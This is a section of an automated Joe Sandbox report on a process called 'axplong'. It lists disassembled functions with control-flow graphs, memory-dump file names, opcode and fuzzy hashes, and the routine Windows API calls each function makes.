                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: aea44c1bad9aa15f64fd1cf08ebe77578293f31a934912c2c409db0731ab0716
                      • Instruction ID: 8837604e71e283565e2d9a28ab912fd16dc413ba113761811ae00606c7a0da47
                      • Opcode Fuzzy Hash: aea44c1bad9aa15f64fd1cf08ebe77578293f31a934912c2c409db0731ab0716
                      • Instruction Fuzzy Hash: 9B412875900244AFDB24EFB5ED419AFBBF9EF8A300B14442DF956D3291EB31A904CB60
                      Function 00AAD4F4 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1307 aad4f4-aad515 call a8deb0 1310 aad52f-aad532 1307->1310 1311 aad517 1307->1311 1313 aad54e-aad55a call aaa688 1310->1313 1314 aad534-aad537 1310->1314 1312 aad519-aad51f 1311->1312 1311->1313 1316 aad543-aad54c call aad43c 1312->1316 1317 aad521-aad525 1312->1317 1325 aad55c-aad55f 1313->1325 1326 aad564-aad570 call aad47e 1313->1326 1314->1316 1318 aad539-aad53c 1314->1318 1329 aad58c-aad595 1316->1329 1317->1313 1321 aad527-aad52b 1317->1321 1322 aad53e-aad541 1318->1322 1323 aad572-aad582 call aa7443 call aa6b8a 1318->1323 1321->1323 1327 aad52d 1321->1327 1322->1316 1322->1323 1323->1325 1330 aad6cb-aad6da 1325->1330 1326->1323 1340 aad584-aad589 1326->1340 1327->1316 1333 aad5a2-aad5b3 1329->1333 1334 aad597-aad59f call aa8c8b 1329->1334 1338 aad5c9 1333->1338 1339 aad5b5-aad5c7 1333->1339 1334->1333 1343 aad5cb-aad5dc 1338->1343 1339->1343 1340->1329 1344 aad64a-aad65a call aad687 1343->1344 1345 aad5de-aad5e0 1343->1345 1356 aad6c9 1344->1356 1357 aad65c-aad65e 1344->1357 1347 aad6db-aad6dd 1345->1347 1348 aad5e6-aad5e8 1345->1348 1352 aad6df-aad6e6 call aa8cd3 1347->1352 1353 aad6e7-aad6fa call aa651d 1347->1353 1350 aad5ea-aad5ed 1348->1350 1351 aad5f4-aad600 1348->1351 1350->1351 1358 aad5ef-aad5f2 1350->1358 1359 aad602-aad617 call aad4eb * 2 1351->1359 1360 aad640-aad648 1351->1360 1352->1353 1373 aad708-aad70e 1353->1373 1374 aad6fc-aad706 1353->1374 1356->1330 1363 aad699-aad6a2 1357->1363 1364 aad660-aad676 call aaa531 1357->1364 1358->1351 1365 aad61a-aad61c 1358->1365 1359->1365 1360->1344 1383 aad6a5-aad6a8 1363->1383 1364->1383 1365->1360 1367 aad61e-aad62e 1365->1367 1372 aad630-aad635 1367->1372 1372->1344 1378 aad637-aad63e 1372->1378 1380 aad710-aad711 1373->1380 1381 aad727-aad738 RtlAllocateHeap 1373->1381 1374->1373 1379 aad73c-aad747 call aa7443 1374->1379 1378->1372 1390 aad749-aad74b 1379->1390 1380->1381 1384 aad73a 1381->1384 1385 aad713-aad71a call aa9c81 1381->1385 1388 aad6aa-aad6ad 1383->1388 1389 aad6b4-aad6bc 1383->1389 1384->1390 1385->1379 1397 aad71c-aad725 call aa8cf9 1385->1397 1388->1389 1393 aad6af-aad6b2 1388->1393 1389->1356 1394 aad6be-aad6c6 call aaa531 1389->1394 1393->1356 1393->1389 1394->1356 1397->1379 1397->1381
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1d4a2cb1ed37a76aa38ad65bc4cafe57fff8a5cb332d0b7130dd90e48b64bff
                      • Instruction ID: a0b18c31558b526406c520db0fbb4eea53ae8c0ed544650bb083be522dcaae8f
                      • Opcode Fuzzy Hash: d1d4a2cb1ed37a76aa38ad65bc4cafe57fff8a5cb332d0b7130dd90e48b64bff
                      • Instruction Fuzzy Hash: 7161F372D102158FDF25EFA8D9856EDBBB1EB57314F28411AE48BABAD0D7308C01CB61
                      Function 00A782B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1401 a782b0-a78331 call aa4020 1405 a78333-a78338 1401->1405 1406 a7833d-a78365 call a87870 call a75b20 1401->1406 1407 a7847f-a7849b call a8cf21 1405->1407 1414 a78367 1406->1414 1415 a78369-a7838b call a87870 call a75b20 1406->1415 1414->1415 1420 a7838f-a783a8 1415->1420 1421 a7838d 1415->1421 1424 a783aa-a783b9 1420->1424 1425 a783d9-a78404 1420->1425 1421->1420 1428 a783cf-a783d6 call a8d593 1424->1428 1429 a783bb-a783c9 1424->1429 1426 a78406-a78415 1425->1426 1427 a78431-a78452 1425->1427 1430 a78427-a7842e call a8d593 1426->1430 1431 a78417-a78425 1426->1431 1432 a78454-a78456 GetNativeSystemInfo 1427->1432 1433 a78458-a7845d 1427->1433 1428->1425 1429->1428 1434 a7849c-a784a1 call aa6b9a 1429->1434 1430->1427 1431->1430 1431->1434 1439 a7845e-a78465 1432->1439 1433->1439 1439->1407 1443 a78467-a7846f 1439->1443 1444 a78471-a78476 1443->1444 1445 a78478-a7847b 1443->1445 1444->1407 1445->1407 1446 a7847d 1445->1446 1446->1407
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00A78454
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 1a5d6feb0c1adf4a7d5a9543b39df160b670a3b82b81024211ada166beee72a9
                      • Instruction ID: 602d8d8d406381335b403a860ea3da2a6e58e5044cdecfd2adf5b3dacf605142
                      • Opcode Fuzzy Hash: 1a5d6feb0c1adf4a7d5a9543b39df160b670a3b82b81024211ada166beee72a9
                      • Instruction Fuzzy Hash: 39513C71D442089BEB14EF38CD497DDB775EB45310F50C2A9E808A72C1EF759E808BA1
                      Function 00A78A60 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1447 a78a60-a78ab7 GetTempPathA call a87870 1449 a78abc-a78af0 call a75b20 1447->1449 1452 a78af7-a78afc 1449->1452 1452->1452 1453 a78afe-a78b83 call a87f30 * 2 call a88150 1452->1453 1460 a78b85-a78b94 1453->1460 1461 a78bb4-a78bd8 1453->1461 1464 a78b96-a78ba4 1460->1464 1465 a78baa-a78bb1 call a8d593 1460->1465 1462 a78c05-a78c0e 1461->1462 1463 a78bda-a78be9 1461->1463 1468 a78c10-a78c1f 1462->1468 1469 a78c3b-a78c57 call a8cf21 1462->1469 1466 a78bfb-a78c02 call a8d593 1463->1466 1467 a78beb-a78bf9 1463->1467 1464->1465 1470 a78c58-a78c5f call aa6b9a 1464->1470 1465->1461 1466->1462 1467->1466 1467->1470 1475 a78c31-a78c38 call a8d593 1468->1475 1476 a78c21-a78c2f 1468->1476 1475->1469 1476->1470 1476->1475
                      APIs
                      • GetTempPathA.KERNELBASE(00000104,?,007A9F3D,?,00000000), ref: 00A78AA7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: PathTemp
                      • String ID:
                      • API String ID: 2920410445-0
                      • Opcode ID: d105add66c31dc9668dde9eba2dbb0378bced845b82e09f821a6f7800e2732c0
                      • Instruction ID: 9280aa6ea3228fcf9a2df53a6f685ab0fcf92a34e5e3f343554bc30b2840edbc
                      • Opcode Fuzzy Hash: d105add66c31dc9668dde9eba2dbb0378bced845b82e09f821a6f7800e2732c0
                      • Instruction Fuzzy Hash: 7C51D1719011589BEB29DB28CE897DDBB75EB85310F1082E9E40DA7281DB395F84CFA1
                      Function 00AA6C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1483 aa6c99-aa6ca5 1484 aa6ca7-aa6cc3 call aa7430 call aa7443 call aa6b8a 1483->1484 1485 aa6cc4-aa6ce8 call aa4020 1483->1485 1490 aa6cea-aa6d04 call aa7430 call aa7443 call aa6b8a 1485->1490 1491 aa6d06-aa6d28 CreateFileW 1485->1491 1515 aa6d72-aa6d76 1490->1515 1494 aa6d2a-aa6d2e call aa6e01 1491->1494 1495 aa6d38-aa6d3f call aa6d77 1491->1495 1503 aa6d33-aa6d36 1494->1503 1505 aa6d40-aa6d42 1495->1505 1503->1505 1507 aa6d64-aa6d67 1505->1507 1508 aa6d44-aa6d61 call aa4020 1505->1508 1511 aa6d69-aa6d6f 1507->1511 1512 aa6d70 1507->1512 1508->1507 1511->1512 1512->1515
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a8f362010a52e5727966db2948d0f74064b488896cd5aefb54a04e35a230a05
                      • Instruction ID: b5e7506325309cb26fb48d38d128ce3e5a1eaf1dd398c4291d9f7bc53561912d
                      • Opcode Fuzzy Hash: 8a8f362010a52e5727966db2948d0f74064b488896cd5aefb54a04e35a230a05
                      • Instruction Fuzzy Hash: AC210772A056087BEB11BB64DD42BAF37299F43378F290310F9343B1D1DB705E059AA1
                      Function 00AA6F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1517 aa6f71-aa6f87 1518 aa6f89-aa6f8d 1517->1518 1519 aa6f97-aa6fa7 1517->1519 1518->1519 1520 aa6f8f-aa6f95 1518->1520 1523 aa6fa9-aa6fbb SystemTimeToTzSpecificLocalTime 1519->1523 1524 aa6fe7-aa6fea 1519->1524 1521 aa6fec-aa6ff7 call a8cf21 1520->1521 1523->1524 1526 aa6fbd-aa6fdd call aa6ff8 1523->1526 1524->1521 1529 aa6fe2-aa6fe5 1526->1529 1529->1521
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00AA6FB3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: ac868cb5760a1f1aefc0aa3ca6af9b9f0d9251e8090a4dfc4fe469b55f174ebe
                      • Instruction ID: b089bb429f59596abb85e51f609b86f2cb25d5a2474f91619b7cf1c5ee67b436
                      • Opcode Fuzzy Hash: ac868cb5760a1f1aefc0aa3ca6af9b9f0d9251e8090a4dfc4fe469b55f174ebe
                      • Instruction Fuzzy Hash: AE11E8B290020CAEDB11DF95D980EDFB7BCAB09310F645266E512E7180EB31EB45CBA1
                      Function 00AAD6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1530 aad6ef-aad6fa 1531 aad708-aad70e 1530->1531 1532 aad6fc-aad706 1530->1532 1534 aad710-aad711 1531->1534 1535 aad727-aad738 RtlAllocateHeap 1531->1535 1532->1531 1533 aad73c-aad747 call aa7443 1532->1533 1540 aad749-aad74b 1533->1540 1534->1535 1537 aad73a 1535->1537 1538 aad713-aad71a call aa9c81 1535->1538 1537->1540 1538->1533 1543 aad71c-aad725 call aa8cf9 1538->1543 1543->1533 1543->1535
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00AAA5ED,?,00AA74AE,?,00000000,?), ref: 00AAD731
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: cb5bc94dcc0bab4e9b78dd7af30bd989db93cbe64cbd37538474e44140e942d8
                      • Instruction ID: e3e319184f8188d9258f43b0d0a411cf3244933e0019ae40d50651ce62538781
                      • Opcode Fuzzy Hash: cb5bc94dcc0bab4e9b78dd7af30bd989db93cbe64cbd37538474e44140e942d8
                      • Instruction Fuzzy Hash: DBF0E231A45225669B297B629E41A6B3B999F837B0B188111EC87AB9C1CF34D80056E1
                      Function 00A86AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: f5af02a1dde84664323dd0726ce73b794c20761a14726c0be48ff6d095fa5907
                      • Instruction ID: 5b0cc2ea6c978949aa0010f97a0ddad3d2da7520d7b06963e69719c9dac7517b
                      • Opcode Fuzzy Hash: f5af02a1dde84664323dd0726ce73b794c20761a14726c0be48ff6d095fa5907
                      • Instruction Fuzzy Hash: A9F0F431E00604BBC700BBBC9E07B1D7B74AB16B60F904759E822673E1EA705A0087D3
                      Function 04B10CE7 Relevance: .1, Instructions: 135COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 081a819c91d0a1a72a8da95a53ddfd94d0aab206a3ac2055a0620cde81f756f9
                      • Instruction ID: 7168404cefe8c33996c8ce29d820c8589675ed504fe4c94776d00ac10db45ba3
                      • Opcode Fuzzy Hash: 081a819c91d0a1a72a8da95a53ddfd94d0aab206a3ac2055a0620cde81f756f9
                      • Instruction Fuzzy Hash: 992160EB34C124BD7242A0422B54AFB676ED1D26307B0C8A7FC06C5D26F2852AC97472
                      Function 04B10CCA Relevance: .1, Instructions: 133COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5f02b759ec977606aa1534060feaa75f06b656ba9a1680080201cfd76d46781
                      • Instruction ID: 32a410e3ca9c4605e3fb2598672fd25efa26137a96104adeb1b27c101d96ec60
                      • Opcode Fuzzy Hash: d5f02b759ec977606aa1534060feaa75f06b656ba9a1680080201cfd76d46781
                      • Instruction Fuzzy Hash: 65212FEB34C115BD7242A4422B54EFB676ED1D6730771C8ABFC07C5826F2992AC97071
                      Function 04B10D4F Relevance: .1, Instructions: 129COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 060c817ed0cfde5ab8e57287aeb617d8b16fc1a0a1c6e5f2ea3aaf1fa312e683
                      • Instruction ID: 172ebfc4f724df5879d2a504ae4f3a8af63d5ab02a3c8071f22271eaa2a4bf5d
                      • Opcode Fuzzy Hash: 060c817ed0cfde5ab8e57287aeb617d8b16fc1a0a1c6e5f2ea3aaf1fa312e683
                      • Instruction Fuzzy Hash: 652108EB24C110BD734275425F55AF77B6EE2D773077088AAFC42C5822F2952AC97072
                      Function 04B10CFB Relevance: .1, Instructions: 120COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e4fca4e445fac030683dd331f610ca7fe79f5db3ba5d376b550d70e1a4c8d09
                      • Instruction ID: fd1cd4d127d9f8bb43ce38a0326ce4629b91cb081613e0406da481071b2761d7
                      • Opcode Fuzzy Hash: 3e4fca4e445fac030683dd331f610ca7fe79f5db3ba5d376b550d70e1a4c8d09
                      • Instruction Fuzzy Hash: 94216FEB24C114BD6342B5422B549FA6B6EE1D73307B088ABFC06C5922F2952AC97071
                      Function 04B10D87 Relevance: .1, Instructions: 118COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b92f7af253de60845c1aafff6444096d06251c386e3b42791a77830e39a12288
                      • Instruction ID: 322bd55eb77df73fd19440df2b0e705f7ac8384c25872a315b929e9f9180d3bd
                      • Opcode Fuzzy Hash: b92f7af253de60845c1aafff6444096d06251c386e3b42791a77830e39a12288
                      • Instruction Fuzzy Hash: 8C21C79B24C2107EE30275425B10AF67B6DE6D3230BB048E7F846C9C66F28566C97171
                      Function 04B10D0E Relevance: .1, Instructions: 106COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c4cb7b525685c3c8145d44ec930422dcc843fca259baa1841b36a0c962a7d421
                      • Instruction ID: f7f39da05f0ec404813f763b7417eca1acafcdad220fc99d644b0e1ee5be1170
                      • Opcode Fuzzy Hash: c4cb7b525685c3c8145d44ec930422dcc843fca259baa1841b36a0c962a7d421
                      • Instruction Fuzzy Hash: 601193EB34C110BD6242B4432B50AFA7B6EE1D72307B188A7F803C5D12B2892AC97071
                      Function 04B10D29 Relevance: .1, Instructions: 101COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4593bcf1523f4b59ea26de9a33292bacb70f44fbb8e0ed0cbf513b367e7011f
                      • Instruction ID: 07c0921db7de1a23e9cfb872b0f90f717614a9d206cb513d291379f761eda3d0
                      • Opcode Fuzzy Hash: f4593bcf1523f4b59ea26de9a33292bacb70f44fbb8e0ed0cbf513b367e7011f
                      • Instruction Fuzzy Hash: 021108EB24C210BE634271426B509F77B6EE6D373077088A7F846C6953F2952AC97071
